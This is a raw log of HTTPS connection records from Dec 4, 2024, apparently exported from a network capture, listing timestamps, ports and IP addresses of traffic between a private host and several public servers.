                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.788130999 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.788311005 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.788500071 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.788506031 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.990606070 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.991059065 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.991077900 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.992367029 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.992450953 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.992827892 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.992986917 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.993570089 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.035190105 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.035213947 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.081568956 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.104496002 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.104846954 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.104882956 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.111881971 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.116986990 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.117172003 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.117280006 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.127726078 CET4435010418.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.127816916 CET4435010418.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.127880096 CET50104443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.133472919 CET50104443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.133498907 CET4435010418.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.163327932 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.235584974 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.243410110 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.243432999 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.243885040 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.254471064 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.254573107 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.255215883 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.299326897 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.536887884 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.536956072 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.537030935 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.537246943 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.537260056 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.641387939 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.641516924 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.642420053 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.642431021 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.644812107 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.644823074 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.661019087 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.661418915 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.661442041 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.663482904 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.663563013 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.664783001 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.664851904 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.693844080 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.693867922 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.693926096 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.693948030 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.693964005 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.694006920 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.695975065 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.695997953 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.704992056 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.705014944 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.719630003 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.730170012 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.730194092 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.731364012 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.731420994 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.731745005 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.731817961 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.734049082 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.734091997 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.734194994 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.736179113 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.736200094 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.751415968 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.752464056 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.752523899 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.752604961 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.754962921 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.754978895 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.764425993 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.764461040 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.764516115 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.764818907 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.764827013 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.783054113 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.783087015 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.787956953 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.790501118 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.790644884 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.790894032 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.790911913 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.829766035 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.996952057 CET44350112204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.997590065 CET50112443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.997617006 CET44350112204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.998660088 CET44350112204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.998718023 CET50112443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.999787092 CET50112443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.999882936 CET44350112204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.003277063 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.003307104 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.003350019 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.003361940 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.005076885 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.005131006 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.005306959 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.005362034 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.005378962 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.052676916 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.052967072 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.052997112 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.053483009 CET50112443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.053502083 CET44350112204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.054028988 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.054094076 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.055080891 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.055171967 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.061649084 CET44350113204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.061887980 CET50113443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.061907053 CET44350113204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.062964916 CET44350113204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.063051939 CET50113443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.064147949 CET50113443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.064219952 CET44350113204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.096010923 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.096014023 CET50112443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.096035004 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.111069918 CET50113443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.111095905 CET44350113204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.142179966 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.158116102 CET50113443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534123898 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534146070 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534204006 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534209013 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534244061 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.534272909 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.538337946 CET50109443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.538371086 CET44350109159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.542046070 CET50119443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.542107105 CET44350119159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.542187929 CET50119443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.542460918 CET50119443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.542476892 CET44350119159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.982325077 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.983596087 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.983623981 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.987772942 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.989186049 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.989881039 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.989885092 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.993071079 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.997009039 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.997653961 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.997674942 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.001281023 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.001378059 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.003951073 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.004309893 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.004316092 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.005312920 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.006920099 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.006932974 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.007286072 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.007417917 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.007695913 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.007771969 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.008059978 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.035028934 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.047885895 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.047907114 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.051326036 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.095479012 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.155916929 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.156322956 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.156358004 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.156733990 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.157203913 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.157279015 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.157370090 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.199337006 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.203891039 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577595949 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577625990 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577641010 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577701092 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577723980 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.577764034 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.579941988 CET50120443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.579982996 CET44350120104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.580055952 CET50120443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.580375910 CET50120443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.580388069 CET44350120104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613609076 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613651991 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613663912 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613686085 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613712072 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613732100 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613769054 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613785982 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613785982 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.613825083 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.618311882 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.618485928 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.618547916 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.619832039 CET50115443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.619859934 CET4435011520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627852917 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627882004 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627887964 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627903938 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627909899 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627914906 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627923965 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627938032 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.627993107 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.666112900 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.666138887 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.666219950 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.666249037 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.666290998 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.674767971 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.674834967 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685153961 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685167074 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685184002 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685225964 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685242891 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.685286045 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.700165033 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.700192928 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.700242043 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.700258970 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.700310946 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.702361107 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.702413082 CET50118443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.708884001 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.708935976 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.781658888 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.781687021 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.781781912 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.781814098 CET4435011623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.781887054 CET50116443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806555986 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806608915 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806636095 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806665897 CET4435011723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806688070 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.806704044 CET50117443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.821837902 CET4435011823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:33.821861029 CET4435011823.57.90.101192.168.2.6
